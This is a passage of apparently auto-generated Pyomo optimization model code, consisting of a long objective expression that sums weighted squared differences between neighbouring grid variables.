m.x464 - 1.3*m.x463)**2) + 2.51714661263041*((8.11690209768664*m.x491 - 8.11690209768664*m.x464)
**2 + (1.3*m.x465 - 1.3*m.x464)**2) + 2.51714661263041*((8.11690209768664*m.x492 -
8.11690209768664*m.x465)**2 + (1.3*m.x466 - 1.3*m.x465)**2) + 2.51714661263041*((8.11690209768664
*m.x493 - 8.11690209768664*m.x466)**2 + (1.3*m.x467 - 1.3*m.x466)**2) + 2.51714661263041*((
8.11690209768664*m.x494 - 8.11690209768664*m.x467)**2 + (1.3*m.x468 - 1.3*m.x467)**2) +
2.51714661263041*((8.11690209768664*m.x495 - 8.11690209768664*m.x468)**2 + (1.3*m.x469 - 1.3*
m.x468)**2) + 2.51714661263041*((8.11690209768664*m.x496 - 8.11690209768664*m.x469)**2 + (1.3*
m.x470 - 1.3*m.x469)**2) + 2.51714661263041*((8.11690209768664*m.x497 - 8.11690209768664*m.x470)
**2 + (1.3*m.x471 - 1.3*m.x470)**2) + 2.51714661263041*((8.11690209768664*m.x498 -
8.11690209768664*m.x471)**2 + (1.3*m.x472 - 1.3*m.x471)**2) + 2.51714661263041*((8.11690209768664
*m.x499 - 8.11690209768664*m.x472)**2 + (1.3*m.x473 - 1.3*m.x472)**2) + 2.51714661263041*((
8.11690209768664*m.x500 - 8.11690209768664*m.x473)**2 + (1.3*m.x474 - 1.3*m.x473)**2) +
2.51714661263041*((8.11690209768664*m.x501 - 8.11690209768664*m.x474)**2 + (1.3*m.x475 - 1.3*
m.x474)**2) + 2.51714661263041*((8.11690209768664*m.x502 - 8.11690209768664*m.x475)**2 + (1.3*
m.x476 - 1.3*m.x475)**2) + 2.51714661263041*((8.11690209768664*m.x503 - 8.11690209768664*m.x476)
**2 + (1.3*m.x477 - 1.3*m.x476)**2) + 2.51714661263041*((8.11690209768664*m.x504 -
8.11690209768664*m.x477)**2 + (1.3*m.x478 - 1.3*m.x477)**2) + 2.51714661263041*((8.11690209768664
*m.x505 - 8.11690209768664*m.x478)**2 + (1.3*m.x479 - 1.3*m.x478)**2) + 2.51714661263041*((
8.11690209768664*m.x506 - 8.11690209768664*m.x479)**2 + (1.3*m.x480 - 1.3*m.x479)**2) +
2.51714661263041*((8.11690209768664*m.x507 - 8.11690209768664*m.x480)**2 + (1.3*m.x481 - 1.3*
m.x480)**2) + 2.51714661263041*((8.11690209768664*m.x508 - 8.11690209768664*m.x481)**2 + (1.3*
m.x482 - 1.3*m.x481)**2) + 2.51714661263041*((8.11690209768664*m.x509 - 8.11690209768664*m.x482)
**2 + (1.3*m.x483 - 1.3*m.x482)**2) + 2.51714661263041*((8.11690209768664*m.x510 -
8.11690209768664*m.x483)**2 + (1.3*m.x484 - 1.3*m.x483)**2) + 2.51714661263041*((8.11690209768664
*m.x511 - 8.11690209768664*m.x484)**2 + (1.3*m.x485 - 1.3*m.x484)**2) + 2.51714661263041*((
8.11690209768664*m.x512 - 8.11690209768664*m.x485)**2 + (1.3*m.x486 - 1.3*m.x485)**2) +
2.44060689052043*((8.11690209768664*m.x514 - 8.11690209768664*m.x487)**2 + (1.3*m.x488 - 1.3*
m.x487)**2) + 2.44060689052043*((8.11690209768664*m.x515 - 8.11690209768664*m.x488)**2 + (1.3*
m.x489 - 1.3*m.x488)**2) + 2.44060689052043*((8.11690209768664*m.x516 - 8.11690209768664*m.x489)
**2 + (1.3*m.x490 - 1.3*m.x489)**2) + 2.44060689052043*((8.11690209768664*m.x517 -
8.11690209768664*m.x490)**2 + (1.3*m.x491 - 1.3*m.x490)**2) + 2.44060689052043*((8.11690209768664
*m.x518 - 8.11690209768664*m.x491)**2 + (1.3*m.x492 - 1.3*m.x491)**2) + 2.44060689052043*((
8.11690209768664*m.x519 - 8.11690209768664*m.x492)**2 + (1.3*m.x493 - 1.3*m.x492)**2) +
2.44060689052043*((8.11690209768664*m.x520 - 8.11690209768664*m.x493)**2 + (1.3*m.x494 - 1.3*
m.x493)**2) + 2.44060689052043*((8.11690209768664*m.x521 - 8.11690209768664*m.x494)**2 + (1.3*
m.x495 - 1.3*m.x494)**2) + 2.44060689052043*((8.11690209768664*m.x522 - 8.11690209768664*m.x495)
**2 + (1.3*m.x496 - 1.3*m.x495)**2) + 2.44060689052043*((8.11690209768664*m.x523 -
8.11690209768664*m.x496)**2 + (1.3*m.x497 - 1.3*m.x496)**2) + 2.44060689052043*((8.11690209768664
*m.x524 - 8.11690209768664*m.x497)**2 + (1.3*m.x498 - 1.3*m.x497)**2) + 2.44060689052043*((
8.11690209768664*m.x525 - 8.11690209768664*m.x498)**2 + (1.3*m.x499 - 1.3*m.x498)**2) +
2.44060689052043*((8.11690209768664*m.x526 - 8.11690209768664*m.x499)**2 + (1.3*m.x500 - 1.3*
m.x499)**2) + 2.44060689052043*((8.11690209768664*m.x527 - 8.11690209768664*m.x500)**2 + (1.3*
m.x501 - 1.3*m.x500)**2) + 2.44060689052043*((8.11690209768664*m.x528 - 8.11690209768664*m.x501)
**2 + (1.3*m.x502 - 1.3*m.x501)**2) + 2.44060689052043*((8.11690209768664*m.x529 -
8.11690209768664*m.x502)**2 + (1.3*m.x503 - 1.3*m.x502)**2) + 2.44060689052043*((8.11690209768664
*m.x530 - 8.11690209768664*m.x503)**2 + (1.3*m.x504 - 1.3*m.x503)**2) + 2.44060689052043*((
8.11690209768664*m.x531 - 8.11690209768664*m.x504)**2 + (1.3*m.x505 - 1.3*m.x504)**2) +
2.44060689052043*((8.11690209768664*m.x532 - 8.11690209768664*m.x505)**2 + (1.3*m.x506 - 1.3*
m.x505)**2) + 2.44060689052043*((8.11690209768664*m.x533 - 8.11690209768664*m.x506)**2 + (1.3*
m.x507 - 1.3*m.x506)**2) + 2.44060689052043*((8.11690209768664*m.x534 - 8.11690209768664*m.x507)
**2 + (1.3*m.x508 - 1.3*m.x507)**2) + 2.44060689052043*((8.11690209768664*m.x535 -
8.11690209768664*m.x508)**2 + (1.3*m.x509 - 1.3*m.x508)**2) + 2.44060689052043*((8.11690209768664
*m.x536 - 8.11690209768664*m.x509)**2 + (1.3*m.x510 - 1.3*m.x509)**2) + 2.44060689052043*((
8.11690209768664*m.x537 - 8.11690209768664*m.x510)**2 + (1.3*m.x511 - 1.3*m.x510)**2) +
2.44060689052043*((8.11690209768664*m.x538 - 8.11690209768664*m.x511)**2 + (1.3*m.x512 - 1.3*
m.x511)**2) + 2.44060689052043*((8.11690209768664*m.x539 - 8.11690209768664*m.x512)**2 + (1.3*
m.x513 - 1.3*m.x512)**2) + 2.3733844381995*((8.11690209768664*m.x541 - 8.11690209768664*m.x514)**
2 + (1.3*m.x515 - 1.3*m.x514)**2) + 2.3733844381995*((8.11690209768664*m.x542 - 8.11690209768664*
m.x515)**2 + (1.3*m.x516 - 1.3*m.x515)**2) + 2.3733844381995*((8.11690209768664*m.x543 -
8.11690209768664*m.x516)**2 + (1.3*m.x517 - 1.3*m.x516)**2) + 2.3733844381995*((8.11690209768664*
m.x544 - 8.11690209768664*m.x517)**2 + (1.3*m.x518 - 1.3*m.x517)**2) + 2.3733844381995*((
8.11690209768664*m.x545 - 8.11690209768664*m.x518)**2 + (1.3*m.x519 - 1.3*m.x518)**2) +
2.3733844381995*((8.11690209768664*m.x546 - 8.11690209768664*m.x519)**2 + (1.3*m.x520 - 1.3*
m.x519)**2) + 2.3733844381995*((8.11690209768664*m.x547 - 8.11690209768664*m.x520)**2 + (1.3*
m.x521 - 1.3*m.x520)**2) + 2.3733844381995*((8.11690209768664*m.x548 - 8.11690209768664*m.x521)**
2 + (1.3*m.x522 - 1.3*m.x521)**2) + 2.3733844381995*((8.11690209768664*m.x549 - 8.11690209768664*
m.x522)**2 + (1.3*m.x523 - 1.3*m.x522)**2) + 2.3733844381995*((8.11690209768664*m.x550 -
8.11690209768664*m.x523)**2 + (1.3*m.x524 - 1.3*m.x523)**2) + 2.3733844381995*((8.11690209768664*
m.x551 - 8.11690209768664*m.x524)**2 + (1.3*m.x525 - 1.3*m.x524)**2) + 2.3733844381995*((
8.11690209768664*m.x552 - 8.11690209768664*m.x525)**2 + (1.3*m.x526 - 1.3*m.x525)**2) +
2.3733844381995*((8.11690209768664*m.x553 - 8.11690209768664*m.x526)**2 + (1.3*m.x527 - 1.3*
m.x526)**2) + 2.3733844381995*((8.11690209768664*m.x554 - 8.11690209768664*m.x527)**2 + (1.3*
m.x528 - 1.3*m.x527)**2) + 2.3733844381995*((8.11690209768664*m.x555 - 8.11690209768664*m.x528)**
2 + (1.3*m.x529 - 1.3*m.x528)**2) + 2.3733844381995*((8.11690209768664*m.x556 - 8.11690209768664*
m.x529)**2 + (1.3*m.x530 - 1.3*m.x529)**2) + 2.3733844381995*((8.11690209768664*m.x557 -
8.11690209768664*m.x530)**2 + (1.3*m.x531 - 1.3*m.x530)**2) + 2.3733844381995*((8.11690209768664*
m.x558 - 8.11690209768664*m.x531)**2 + (1.3*m.x532 - 1.3*m.x531)**2) + 2.3733844381995*((
8.11690209768664*m.x559 - 8.11690209768664*m.x532)**2 + (1.3*m.x533 - 1.3*m.x532)**2) +
2.3733844381995*((8.11690209768664*m.x560 - 8.11690209768664*m.x533)**2 + (1.3*m.x534 - 1.3*
m.x533)**2) + 2.3733844381995*((8.11690209768664*m.x561 - 8.11690209768664*m.x534)**2 + (1.3*
m.x535 - 1.3*m.x534)**2) + 2.3733844381995*((8.11690209768664*m.x562 - 8.11690209768664*m.x535)**
2 + (1.3*m.x536 - 1.3*m.x535)**2) + 2.3733844381995*((8.11690209768664*m.x563 - 8.11690209768664*
m.x536)**2 + (1.3*m.x537 - 1.3*m.x536)**2) + 2.3733844381995*((8.11690209768664*m.x564 -
8.11690209768664*m.x537)**2 + (1.3*m.x538 - 1.3*m.x537)**2) + 2.3733844381995*((8.11690209768664*
m.x565 - 8.11690209768664*m.x538)**2 + (1.3*m.x539 - 1.3*m.x538)**2) + 2.3733844381995*((
8.11690209768664*m.x566 - 8.11690209768664*m.x539)**2 + (1.3*m.x540 - 1.3*m.x539)**2) +
2.31602462576011*((8.11690209768664*m.x568 - 8.11690209768664*m.x541)**2 + (1.3*m.x542 - 1.3*
m.x541)**2) + 2.31602462576011*((8.11690209768664*m.x569 - 8.11690209768664*m.x542)**2 + (1.3*
m.x543 - 1.3*m.x542)**2) + 2.31602462576011*((8.11690209768664*m.x570 - 8.11690209768664*m.x543)
**2 + (1.3*m.x544 - 1.3*m.x543)**2) + 2.31602462576011*((8.11690209768664*m.x571 -
8.11690209768664*m.x544)**2 + (1.3*m.x545 - 1.3*m.x544)**2) + 2.31602462576011*((8.11690209768664
*m.x572 - 8.11690209768664*m.x545)**2 + (1.3*m.x546 - 1.3*m.x545)**2) + 2.31602462576011*((
8.11690209768664*m.x573 - 8.11690209768664*m.x546)**2 + (1.3*m.x547 - 1.3*m.x546)**2) +
2.31602462576011*((8.11690209768664*m.x574 - 8.11690209768664*m.x547)**2 + (1.3*m.x548 - 1.3*
m.x547)**2) + 2.31602462576011*((8.11690209768664*m.x575 - 8.11690209768664*m.x548)**2 + (1.3*
m.x549 - 1.3*m.x548)**2) + 2.31602462576011*((8.11690209768664*m.x576 - 8.11690209768664*m.x549)
**2 + (1.3*m.x550 - 1.3*m.x549)**2) + 2.31602462576011*((8.11690209768664*m.x577 -
8.11690209768664*m.x550)**2 + (1.3*m.x551 - 1.3*m.x550)**2) + 2.31602462576011*((8.11690209768664
*m.x578 - 8.11690209768664*m.x551)**2 + (1.3*m.x552 - 1.3*m.x551)**2) + 2.31602462576011*((
8.11690209768664*m.x579 - 8.11690209768664*m.x552)**2 + (1.3*m.x553 - 1.3*m.x552)**2) +
2.31602462576011*((8.11690209768664*m.x580 - 8.11690209768664*m.x553)**2 + (1.3*m.x554 - 1.3*
m.x553)**2) + 2.31602462576011*((8.11690209768664*m.x581 - 8.11690209768664*m.x554)**2 + (1.3*
m.x555 - 1.3*m.x554)**2) + 2.31602462576011*((8.11690209768664*m.x582 - 8.11690209768664*m.x555)
**2 + (1.3*m.x556 - 1.3*m.x555)**2) + 2.31602462576011*((8.11690209768664*m.x583 -
8.11690209768664*m.x556)**2 + (1.3*m.x557 - 1.3*m.x556)**2) + 2.31602462576011*((8.11690209768664
*m.x584 - 8.11690209768664*m.x557)**2 + (1.3*m.x558 - 1.3*m.x557)**2) + 2.31602462576011*((
8.11690209768664*m.x585 - 8.11690209768664*m.x558)**2 + (1.3*m.x559 - 1.3*m.x558)**2) +
2.31602462576011*((8.11690209768664*m.x586 - 8.11690209768664*m.x559)**2 + (1.3*m.x560 - 1.3*
m.x559)**2) + 2.31602462576011*((8.11690209768664*m.x587 - 8.11690209768664*m.x560)**2 + (1.3*
m.x561 - 1.3*m.x560)**2) + 2.31602462576011*((8.11690209768664*m.x588 - 8.11690209768664*m.x561)
**2 + (1.3*m.x562 - 1.3*m.x561)**2) + 2.31602462576011*((8.11690209768664*m.x589 -
8.11690209768664*m.x562)**2 + (1.3*m.x563 - 1.3*m.x562)**2) + 2.31602462576011*((8.11690209768664
*m.x590 - 8.11690209768664*m.x563)**2 + (1.3*m.x564 - 1.3*m.x563)**2) + 2.31602462576011*((
8.11690209768664*m.x591 - 8.11690209768664*m.x564)**2 + (1.3*m.x565 - 1.3*m.x564)**2) +
2.31602462576011*((8.11690209768664*m.x592 - 8.11690209768664*m.x565)**2 + (1.3*m.x566 - 1.3*
m.x565)**2) + 2.31602462576011*((8.11690209768664*m.x593 - 8.11690209768664*m.x566)**2 + (1.3*
m.x567 - 1.3*m.x566)**2) + 2.26894619536748*((8.11690209768664*m.x595 - 8.11690209768664*m.x568)
**2 + (1.3*m.x569 - 1.3*m.x568)**2) + 2.26894619536748*((8.11690209768664*m.x596 -
8.11690209768664*m.x569)**2 + (1.3*m.x570 - 1.3*m.x569)**2) + 2.26894619536748*((8.11690209768664
*m.x597 - 8.11690209768664*m.x570)**2 + (1.3*m.x571 - 1.3*m.x570)**2) + 2.26894619536748*((
8.11690209768664*m.x598 - 8.11690209768664*m.x571)**2 + (1.3*m.x572 - 1.3*m.x571)**2) +
2.26894619536748*((8.11690209768664*m.x599 - 8.11690209768664*m.x572)**2 + (1.3*m.x573 - 1.3*
m.x572)**2) + 2.26894619536748*((8.11690209768664*m.x600 - 8.11690209768664*m.x573)**2 + (1.3*
m.x574 - 1.3*m.x573)**2) + 2.26894619536748*((8.11690209768664*m.x601 - 8.11690209768664*m.x574)
**2 + (1.3*m.x575 - 1.3*m.x574)**2) + 2.26894619536748*((8.11690209768664*m.x602 -
8.11690209768664*m.x575)**2 + (1.3*m.x576 - 1.3*m.x575)**2) + 2.26894619536748*((8.11690209768664
*m.x603 - 8.11690209768664*m.x576)**2 + (1.3*m.x577 - 1.3*m.x576)**2) + 2.26894619536748*((
8.11690209768664*m.x604 - 8.11690209768664*m.x577)**2 + (1.3*m.x578 - 1.3*m.x577)**2) +
2.26894619536748*((8.11690209768664*m.x605 - 8.11690209768664*m.x578)**2 + (1.3*m.x579 - 1.3*
m.x578)**2) + 2.26894619536748*((8.11690209768664*m.x606 - 8.11690209768664*m.x579)**2 + (1.3*
m.x580 - 1.3*m.x579)**2) + 2.26894619536748*((8.11690209768664*m.x607 - 8.11690209768664*m.x580)
**2 + (1.3*m.x581 - 1.3*m.x580)**2) + 2.26894619536748*((8.11690209768664*m.x608 -
8.11690209768664*m.x581)**2 + (1.3*m.x582 - 1.3*m.x581)**2) + 2.26894619536748*((8.11690209768664
*m.x609 - 8.11690209768664*m.x582)**2 + (1.3*m.x583 - 1.3*m.x582)**2) + 2.26894619536748*((
8.11690209768664*m.x610 - 8.11690209768664*m.x583)**2 + (1.3*m.x584 - 1.3*m.x583)**2) +
2.26894619536748*((8.11690209768664*m.x611 - 8.11690209768664*m.x584)**2 + (1.3*m.x585 - 1.3*
m.x584)**2) + 2.26894619536748*((8.11690209768664*m.x612 - 8.11690209768664*m.x585)**2 + (1.3*
m.x586 - 1.3*m.x585)**2) + 2.26894619536748*((8.11690209768664*m.x613 - 8.11690209768664*m.x586)
**2 + (1.3*m.x587 - 1.3*m.x586)**2) + 2.26894619536748*((8.11690209768664*m.x614 -
8.11690209768664*m.x587)**2 + (1.3*m.x588 - 1.3*m.x587)**2) + 2.26894619536748*((8.11690209768664
*m.x615 - 8.11690209768664*m.x588)**2 + (1.3*m.x589 - 1.3*m.x588)**2) + 2.26894619536748*((
8.11690209768664*m.x616 - 8.11690209768664*m.x589)**2 + (1.3*m.x590 - 1.3*m.x589)**2) +
2.26894619536748*((8.11690209768664*m.x617 - 8.11690209768664*m.x590)**2 + (1.3*m.x591 - 1.3*
m.x590)**2) + 2.26894619536748*((8.11690209768664*m.x618 - 8.11690209768664*m.x591)**2 + (1.3*
m.x592 - 1.3*m.x591)**2) + 2.26894619536748*((8.11690209768664*m.x619 - 8.11690209768664*m.x592)
**2 + (1.3*m.x593 - 1.3*m.x592)**2) + 2.26894619536748*((8.11690209768664*m.x620 -
8.11690209768664*m.x593)**2 + (1.3*m.x594 - 1.3*m.x593)**2) + 2.23245990505138*((8.11690209768664
*m.x622 - 8.11690209768664*m.x595)**2 + (1.3*m.x596 - 1.3*m.x595)**2) + 2.23245990505138*((
8.11690209768664*m.x623 - 8.11690209768664*m.x596)**2 + (1.3*m.x597 - 1.3*m.x596)**2) +
2.23245990505138*((8.11690209768664*m.x624 - 8.11690209768664*m.x597)**2 + (1.3*m.x598 - 1.3*
m.x597)**2) + 2.23245990505138*((8.11690209768664*m.x625 - 8.11690209768664*m.x598)**2 + (1.3*
m.x599 - 1.3*m.x598)**2) + 2.23245990505138*((8.11690209768664*m.x626 - 8.11690209768664*m.x599)
**2 + (1.3*m.x600 - 1.3*m.x599)**2) + 2.23245990505138*((8.11690209768664*m.x627 -
8.11690209768664*m.x600)**2 + (1.3*m.x601 - 1.3*m.x600)**2) + 2.23245990505138*((8.11690209768664
*m.x628 - 8.11690209768664*m.x601)**2 + (1.3*m.x602 - 1.3*m.x601)**2) + 2.23245990505138*((
8.11690209768664*m.x629 - 8.11690209768664*m.x602)**2 + (1.3*m.x603 - 1.3*m.x602)**2) +
2.23245990505138*((8.11690209768664*m.x630 - 8.11690209768664*m.x603)**2 + (1.3*m.x604 - 1.3*
m.x603)**2) + 2.23245990505138*((8.11690209768664*m.x631 - 8.11690209768664*m.x604)**2 + (1.3*
m.x605 - 1.3*m.x604)**2) + 2.23245990505138*((8.11690209768664*m.x632 - 8.11690209768664*m.x605)
**2 + (1.3*m.x606 - 1.3*m.x605)**2) + 2.23245990505138*((8.11690209768664*m.x633 -
8.11690209768664*m.x606)**2 + (1.3*m.x607 - 1.3*m.x606)**2) + 2.23245990505138*((8.11690209768664
*m.x634 - 8.11690209768664*m.x607)**2 + (1.3*m.x608 - 1.3*m.x607)**2) + 2.23245990505138*((
8.11690209768664*m.x635 - 8.11690209768664*m.x608)**2 + (1.3*m.x609 - 1.3*m.x608)**2) +
2.23245990505138*((8.11690209768664*m.x636 - 8.11690209768664*m.x609)**2 + (1.3*m.x610 - 1.3*
m.x609)**2) + 2.23245990505138*((8.11690209768664*m.x637 - 8.11690209768664*m.x610)**2 + (1.3*
m.x611 - 1.3*m.x610)**2) + 2.23245990505138*((8.11690209768664*m.x638 - 8.11690209768664*m.x611)
**2 + (1.3*m.x612 - 1.3*m.x611)**2) + 2.23245990505138*((8.11690209768664*m.x639 -
8.11690209768664*m.x612)**2 + (1.3*m.x613 - 1.3*m.x612)**2) + 2.23245990505138*((8.11690209768664
*m.x640 - 8.11690209768664*m.x613)**2 + (1.3*m.x614 - 1.3*m.x613)**2) + 2.23245990505138*((
8.11690209768664*m.x641 - 8.11690209768664*m.x614)**2 + (1.3*m.x615 - 1.3*m.x614)**2) +
2.23245990505138*((8.11690209768664*m.x642 - 8.11690209768664*m.x615)**2 + (1.3*m.x616 - 1.3*
m.x615)**2) + 2.23245990505138*((8.11690209768664*m.x643 - 8.11690209768664*m.x616)**2 + (1.3*
m.x617 - 1.3*m.x616)**2) + 2.23245990505138*((8.11690209768664*m.x644 - 8.11690209768664*m.x617)
**2 + (1.3*m.x618 - 1.3*m.x617)**2) + 2.23245990505138*((8.11690209768664*m.x645 -
8.11690209768664*m.x618)**2 + (1.3*m.x619 - 1.3*m.x618)**2) + 2.23245990505138*((8.11690209768664
*m.x646 - 8.11690209768664*m.x619)**2 + (1.3*m.x620 - 1.3*m.x619)**2) + 2.23245990505138*((
8.11690209768664*m.x647 - 8.11690209768664*m.x620)**2 + (1.3*m.x621 - 1.3*m.x620)**2) +
2.20678572725218*((8.11690209768664*m.x649 - 8.11690209768664*m.x622)**2 + (1.3*m.x623 - 1.3*
m.x622)**2) + 2.20678572725218*((8.11690209768664*m.x650 - 8.11690209768664*m.x623)**2 + (1.3*
m.x624 - 1.3*m.x623)**2) + 2.20678572725218*((8.11690209768664*m.x651 - 8.11690209768664*m.x624)
**2 + (1.3*m.x625 - 1.3*m.x624)**2) + 2.20678572725218*((8.11690209768664*m.x652 -
8.11690209768664*m.x625)**2 + (1.3*m.x626 - 1.3*m.x625)**2) + 2.20678572725218*((8.11690209768664
*m.x653 - 8.11690209768664*m.x626)**2 + (1.3*m.x627 - 1.3*m.x626)**2) + 2.20678572725218*((
8.11690209768664*m.x654 - 8.11690209768664*m.x627)**2 + (1.3*m.x628 - 1.3*m.x627)**2) +
2.20678572725218*((8.11690209768664*m.x655 - 8.11690209768664*m.x628)**2 + (1.3*m.x629 - 1.3*
m.x628)**2) + 2.20678572725218*((8.11690209768664*m.x656 - 8.11690209768664*m.x629)**2 + (1.3*
m.x630 - 1.3*m.x629)**2) + 2.20678572725218*((8.11690209768664*m.x657 - 8.11690209768664*m.x630)
**2 + (1.3*m.x631 - 1.3*m.x630)**2) + 2.20678572725218*((8.11690209768664*m.x658 -
8.11690209768664*m.x631)**2 + (1.3*m.x632 - 1.3*m.x631)**2) + 2.20678572725218*((8.11690209768664
*m.x659 - 8.11690209768664*m.x632)**2 + (1.3*m.x633 - 1.3*m.x632)**2) + 2.20678572725218*((
8.11690209768664*m.x660 - 8.11690209768664*m.x633)**2 + (1.3*m.x634 - 1.3*m.x633)**2) +
2.20678572725218*((8.11690209768664*m.x661 - 8.11690209768664*m.x634)**2 + (1.3*m.x635 - 1.3*
m.x634)**2) + 2.20678572725218*((8.11690209768664*m.x662 - 8.11690209768664*m.x635)**2 + (1.3*
m.x636 - 1.3*m.x635)**2) + 2.20678572725218*((8.11690209768664*m.x663 - 8.11690209768664*m.x636)
**2 + (1.3*m.x637 - 1.3*m.x636)**2) + 2.20678572725218*((8.11690209768664*m.x664 -
8.11690209768664*m.x637)**2 + (1.3*m.x638 - 1.3*m.x637)**2) + 2.20678572725218*((8.11690209768664
*m.x665 - 8.11690209768664*m.x638)**2 + (1.3*m.x639 - 1.3*m.x638)**2) + 2.20678572725218*((
8.11690209768664*m.x666 - 8.11690209768664*m.x639)**2 + (1.3*m.x640 - 1.3*m.x639)**2) +
2.20678572725218*((8.11690209768664*m.x667 - 8.11690209768664*m.x640)**2 + (1.3*m.x641 - 1.3*
m.x640)**2) + 2.20678572725218*((8.11690209768664*m.x668 - 8.11690209768664*m.x641)**2 + (1.3*
m.x642 - 1.3*m.x641)**2) + 2.20678572725218*((8.11690209768664*m.x669 - 8.11690209768664*m.x642)
**2 + (1.3*m.x643 - 1.3*m.x642)**2) + 2.20678572725218*((8.11690209768664*m.x670 -
8.11690209768664*m.x643)**2 + (1.3*m.x644 - 1.3*m.x643)**2) + 2.20678572725218*((8.11690209768664
*m.x671 - 8.11690209768664*m.x644)**2 + (1.3*m.x645 - 1.3*m.x644)**2) + 2.20678572725218*((
8.11690209768664*m.x672 - 8.11690209768664*m.x645)**2 + (1.3*m.x646 - 1.3*m.x645)**2) +
2.20678572725218*((8.11690209768664*m.x673 - 8.11690209768664*m.x646)**2 + (1.3*m.x647 - 1.3*
m.x646)**2) + 2.20678572725218*((8.11690209768664*m.x674 - 8.11690209768664*m.x647)**2 + (1.3*
m.x648 - 1.3*m.x647)**2) + 2.19206734593218*((8.11690209768664*m.x676 - 8.11690209768664*m.x649)
**2 + (1.3*m.x650 - 1.3*m.x649)**2) + 2.19206734593218*((8.11690209768664*m.x677 -
8.11690209768664*m.x650)**2 + (1.3*m.x651 - 1.3*m.x650)**2) + 2.19206734593218*((8.11690209768664
*m.x678 - 8.11690209768664*m.x651)**2 + (1.3*m.x652 - 1.3*m.x651)**2) + 2.19206734593218*((
8.11690209768664*m.x679 - 8.11690209768664*m.x652)**2 + (1.3*m.x653 - 1.3*m.x652)**2) +
2.19206734593218*((8.11690209768664*m.x680 - 8.11690209768664*m.x653)**2 + (1.3*m.x654 - 1.3*
m.x653)**2) + 2.19206734593218*((8.11690209768664*m.x681 - 8.11690209768664*m.x654)**2 + (1.3*
m.x655 - 1.3*m.x654)**2) + 2.19206734593218*((8.11690209768664*m.x682 - 8.11690209768664*m.x655)
**2 + (1.3*m.x656 - 1.3*m.x655)**2) + 2.19206734593218*((8.11690209768664*m.x683 -
8.11690209768664*m.x656)**2 + (1.3*m.x657 - 1.3*m.x656)**2) + 2.19206734593218*((8.11690209768664
*m.x684 - 8.11690209768664*m.x657)**2 + (1.3*m.x658 - 1.3*m.x657)**2) + 2.19206734593218*((
8.11690209768664*m.x685 - 8.11690209768664*m.x658)**2 + (1.3*m.x659 - 1.3*m.x658)**2) +
2.19206734593218*((8.11690209768664*m.x686 - 8.11690209768664*m.x659)**2 + (1.3*m.x660 - 1.3*
m.x659)**2) + 2.19206734593218*((8.11690209768664*m.x687 - 8.11690209768664*m.x660)**2 + (1.3*
m.x661 - 1.3*m.x660)**2) + 2.19206734593218*((8.11690209768664*m.x688 - 8.11690209768664*m.x661)
**2 + (1.3*m.x662 - 1.3*m.x661)**2) + 2.19206734593218*((8.11690209768664*m.x689 -
8.11690209768664*m.x662)**2 + (1.3*m.x663 - 1.3*m.x662)**2) + 2.19206734593218*((8.11690209768664
*m.x690 - 8.11690209768664*m.x663)**2 + (1.3*m.x664 - 1.3*m.x663)**2) + 2.19206734593218*((
8.11690209768664*m.x691 - 8.11690209768664*m.x664)**2 + (1.3*m.x665 - 1.3*m.x664)**2) +
2.19206734593218*((8.11690209768664*m.x692 - 8.11690209768664*m.x665)**2 + (1.3*m.x666 - 1.3*
m.x665)**2) + 2.19206734593218*((8.11690209768664*m.x693 - 8.11690209768664*m.x666)**2 + (1.3*
m.x667 - 1.3*m.x666)**2) + 2.19206734593218*((8.11690209768664*m.x694 - 8.11690209768664*m.x667)
**2 + (1.3*m.x668 - 1.3*m.x667)**2) + 2.19206734593218*((8.11690209768664*m.x695 -
8.11690209768664*m.x668)**2 + (1.3*m.x669 - 1.3*m.x668)**2) + 2.19206734593218*((8.11690209768664
*m.x696 - 8.11690209768664*m.x669)**2 + (1.3*m.x670 - 1.3*m.x669)**2) + 2.19206734593218*((
8.11690209768664*m.x697 - 8.11690209768664*m.x670)**2 + (1.3*m.x671 - 1.3*m.x670)**2) +
2.19206734593218*((8.11690209768664*m.x698 - 8.11690209768664*m.x671)**2 + (1.3*m.x672 - 1.3*
m.x671)**2) + 2.19206734593218*((8.11690209768664*m.x699 - 8.11690209768664*m.x672)**2 + (1.3*
m.x673 - 1.3*m.x672)**2) + 2.19206734593218*((8.11690209768664*m.x700 - 8.11690209768664*m.x673)
**2 + (1.3*m.x674 - 1.3*m.x673)**2) + 2.19206734593218*((8.11690209768664*m.x701 -
8.11690209768664*m.x674)**2 + (1.3*m.x675 - 1.3*m.x674)**2) + 2.18838296475748*((8.11690209768664
*m.x703 - 8.11690209768664*m.x676)**2 + (1.3*m.x677 - 1.3*m.x676)**2) + 2.18838296475748*((
8.11690209768664*m.x704 - 8.11690209768664*m.x677)**2 + (1.3*m.x678 - 1.3*m.x677)**2) +
2.18838296475748*((8.11690209768664*m.x705 - 8.11690209768664*m.x678)**2 + (1.3*m.x679 - 1.3*
m.x678)**2) + 2.18838296475748*((8.11690209768664*m.x706 - 8.11690209768664*m.x679)**2 + (1.3*
m.x680 - 1.3*m.x679)**2) + 2.18838296475748*((8.11690209768664*m.x707 - 8.11690209768664*m.x680)
**2 + (1.3*m.x681 - 1.3*m.x680)**2) + 2.18838296475748*((8.11690209768664*m.x708 -
8.11690209768664*m.x681)**2 + (1.3*m.x682 - 1.3*m.x681)**2) + 2.18838296475748*((8.11690209768664
*m.x709 - 8.11690209768664*m.x682)**2 + (1.3*m.x683 - 1.3*m.x682)**2) + 2.18838296475748*((
8.11690209768664*m.x710 - 8.11690209768664*m.x683)**2 + (1.3*m.x684 - 1.3*m.x683)**2) +
2.18838296475748*((8.11690209768664*m.x711 - 8.11690209768664*m.x684)**2 + (1.3*m.x685 - 1.3*
m.x684)**2) + 2.18838296475748*((8.11690209768664*m.x712 - 8.11690209768664*m.x685)**2 + (1.3*
m.x686 - 1.3*m.x685)**2) + 2.18838296475748*((8.11690209768664*m.x713 - 8.11690209768664*m.x686)
**2 + (1.3*m.x687 - 1.3*m.x686)**2) + 2.18838296475748*((8.11690209768664*m.x714 -
8.11690209768664*m.x687)**2 + (1.3*m.x688 - 1.3*m.x687)**2) + 2.18838296475748*((8.11690209768664
*m.x715 - 8.11690209768664*m.x688)**2 + (1.3*m.x689 - 1.3*m.x688)**2) + 2.18838296475748*((
8.11690209768664*m.x716 - 8.11690209768664*m.x689)**2 + (1.3*m.x690 - 1.3*m.x689)**2) +
2.18838296475748*((8.11690209768664*m.x717 - 8.11690209768664*m.x690)**2 + (1.3*m.x691 - 1.3*
m.x690)**2) + 2.18838296475748*((8.11690209768664*m.x718 - 8.11690209768664*m.x691)**2 + (1.3*
m.x692 - 1.3*m.x691)**2) + 2.18838296475748*((8.11690209768664*m.x719 - 8.11690209768664*m.x692)
